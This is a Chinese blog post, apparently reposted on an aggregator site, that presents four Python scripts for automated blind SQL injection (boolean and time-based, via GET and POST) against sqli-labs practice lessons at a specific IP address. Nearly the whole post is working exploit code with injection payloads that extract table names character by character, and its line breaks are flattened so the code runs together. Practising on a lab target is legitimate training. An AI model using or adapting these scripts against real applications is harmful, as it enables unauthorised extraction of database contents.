以下腳本都用 sql-labs 中的題目進行測試：

sql-labs 靶場：http://43.247.91.228:84/

?

一，sql注入之 GET傳參 之 布爾型：

import requestsresult = "" url_template = "http://43.247.91.228:84/Less-8/?id=2' and ascii(substr(({0}),{1},1))>{2} %23" chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_,-.@&%/^!~" url_length = "http://43.247.91.228:84/Less-8/?id=2' and length(({0})) >{1} %23"def get_result_length(payload,value):for n in range(1,100):url = url_length.format(payload,n)response = requests.get(url)length = len(response.text)if length >value:print("……data length is :" + str(n))return ndef get_db_name(data_length,payload,value):for i in range(1,data_length):for char in chars:url = url_template.format(payload,i,ord(char))response = requests.get(url)length = len(response.text)if length>value: #根據返回長度的不同來判斷字符正確與否global resultresult += charprint("…… data is :"+ result)break#自定義 sql注入語句 payload 分割符 為0 payload = "select group_concat(table_name) from information_schema.tables where table_schema=database() " # 根據正確訪問時錯誤訪問時返回頁面文本長度的不同 來設置一個判斷值 value = 706 data_length = get_result_length(payload,value)+1 get_db_name(data_length,payload,value) print(result)

二，sql注入之 GET 傳參 之 延時型：

import requests value ="0123456789abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ%&^@_.-!" data=""# 需要 不斷 手工調整 url 和 url_length 中的 limit 的第一個參數 來獲取下一行的數據 url = "http://43.247.91.228:84/Less-9/?id=1' and if((ascii(substr(({0} limit 1,1),{1},1)) = '{2}'),sleep(3),NULL); %23" url_length="http://43.247.91.228:84/Less-9/?id=1' and if((length(({0} limit 1,1))={1} ),sleep(3),NULL); %23" def get_length(payload):for n in range(1,100):url= url_length.format(payload,n)#print(url)if(get_respone(url)):print("[+] length is {0}".format(n))return n def get_data(payload,value,length):for n in range(1,length):for v in value :url_data = url.format(payload,n,ord(v)) #ord（）返回字符的ASCII碼#print(url_data)if(get_respone(url_data)):global datadata=data+vprint("[+] data is {0}".format(data))break def get_respone(url):try:html = requests.get(url,timeout=2)return Falseexcept Exception as e:print("......")return True #可以更改payload 來獲取需要的數據 databse_payload ="select database()" get_data(databse_payload,value,get_length(databse_payload)+1)

三 sql注入之 POST 傳參 之 延時型：

import requests import time value ="0123456789abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ%&^@_.-!" result=""def get_length():#獲取數據的長度for n in range(1, 100):payload = "admin' and if((length(({0} ))={1}),sleep(4),1) #".format(data_payload, n)data = {"uname": payload, "passwd": "admin", "submit": "submit"}start_time = time.time()html = requests.post(url, data=data)end_time = time.time()use_time = end_time - start_time #求出請求前后的時間差來判斷是否延時了if use_time > 3:print("...... data's length is :"+ str(n))return ndef get_data(length):#獲取數據global resultfor n in range(1,length):for v in value:payload = "admin' and if((ascii(substr(({0} ),{1},1)) = '{2}'),sleep(5),1) #".format(data_payload,n,ord(v))data = {"uname":payload,"passwd":"admin","submit":"submit"}start_time = time.time()requests.post(url,data=data)end_time = time.time()use_time = end_time - start_time# 為啥把sleep時間設這么長呢？原因是我這里時常會出現網絡波動，有時候請求時間就有2秒多，為避免出現亂碼，所以設長一點可以保證信息的準確性if use_time >4:result += vprint("......"+result)url = "http://43.247.91.228:84/Less-15/"data_payload ="select group_concat(table_name,0x7e)from information_schema.tables where table_schema=database()"length = get_length() + 1 #注意這里要長度加 1 因為 range（1,10）的范圍是 1<= x <10 get_data(length) print(".....data is :"+ result)

四 sql注入 之 POST 傳參 之 布爾型：

import requestschars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz_,-.@&%/^!~" result = ""def get_length(value): #獲取要查詢的數據的長度for n in range(1,100):payload = "admin' and length(({0})) ={1} #".format(data_payload,n)data = {"uname":payload,"passwd":"admin"}html = requests.post(url,data=data)length = len(html.text)if length >value:print("……data length is :" + str(n))return ndef get_data(data_length,value): #獲取數據global resultfor i in range(1,data_length):for char in chars:payload = "admin'and ascii(substr(({0}),{1},1))={2} #".format(data_payload,i,ord(char))data = {"uname":payload,"passwd":"admin"}html = requests.post(url,data=data)length = len(html.text)if length>value: #根據返回長度的不同來判斷字符正確與否result += charprint("…… data is :"+ result)breakurl = "http://43.247.91.228:84/Less-15/" data_payload = "select group_concat(table_name)from information_schema.tables where table_schema = database()" value = 1460 # 根據正確訪問和錯誤訪問時返回頁面文本長度的不同 來設置一個判斷值，這個值需要在瀏覽器中 按f12 查看length = get_length(value) +1 get_data(length,value) print(result)

?

(以上腳本經過驗證沒有任何問題)

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

?

總結

以上是生活随笔為你收集整理的SQL 盲注GET /POST、布尔型，延时型Python脚本的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。